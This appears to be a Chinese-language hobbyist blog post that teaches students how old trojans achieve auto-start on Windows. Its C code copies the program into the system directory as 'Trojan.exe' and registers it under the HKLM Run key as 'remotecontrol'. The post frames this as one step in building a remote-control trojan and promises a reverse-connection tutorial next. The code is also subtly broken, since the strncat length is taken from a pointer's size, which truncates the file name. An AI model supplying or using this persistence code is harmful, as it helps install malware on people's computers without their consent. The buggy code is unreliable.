实现“老木马”关键技术之一---------自启动
好久没写篇文章了,这么长时间学的知识都零零碎碎的。不知道该怎么总结下。今天写了个自启动的代码,其实没啥含量就是几个api,就完了,还是用C写的,就还是写给学C的大一大二学弟们看看。C还是能处理事情的,这其实只是个实现在启动的代码,是以前的老木马才使用的方法了,杀毒软件会拦截得到的,所以要用最新的方法才行,但是最新的方法呢,这个·········我是不知道了
木马中的自启动呢,就是随电脑启动而启动。自启动方式目前俺就知道3个,一个是修改win.ini配置文件,一个是修改system.ini配置文件,还有一个就是修改注册表。好像直接把程序设置到启动组也可以哦······
下面给出的是修改注册表的代码·····
编译环境VC6.0
编译系统xp sp3
#include <windows.h> #include <stdio.h> void main() { char * temp = NULL; char TempPath[MAX_PATH] = ""; char * ChangeName = "\\Trojan.exe"; //确定windows系统目录 GetSystemDirectory(TempPath,MAX_PATH); temp = TempPath; temp = strncat(temp,ChangeName,sizeof(ChangeName)); int len = strlen(temp); // 把程序复制到系统目录并更名为“Trojan.exe¡” CopyFile("autoboot.exe",temp,FALSE); //第三个参数是当目录中有同名文件的话,会直接覆盖,相反则不会。 HKEY hKey; // 设置注册表中的相关路径 LPCTSTR SetData = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; if (0 == RegOpenKeyEx(HKEY_LOCAL_MACHINE,SetData,0,KEY_WRITE,&hKey)) { if (!(RegSetValueEx(hKey,"remotecontrol",NULL,REG_SZ,LPBYTE(temp),len))) //第二个参数是设置值的名字 { exit(-1); } } RegCloseKey(hKey); }
程序运行后
看截图吧
实现起来不是很难吧,呵呵·····下次会给大家分享反向链接如何实现的·········
----------------------------------------------在穷无非讨饭,不死终会出头。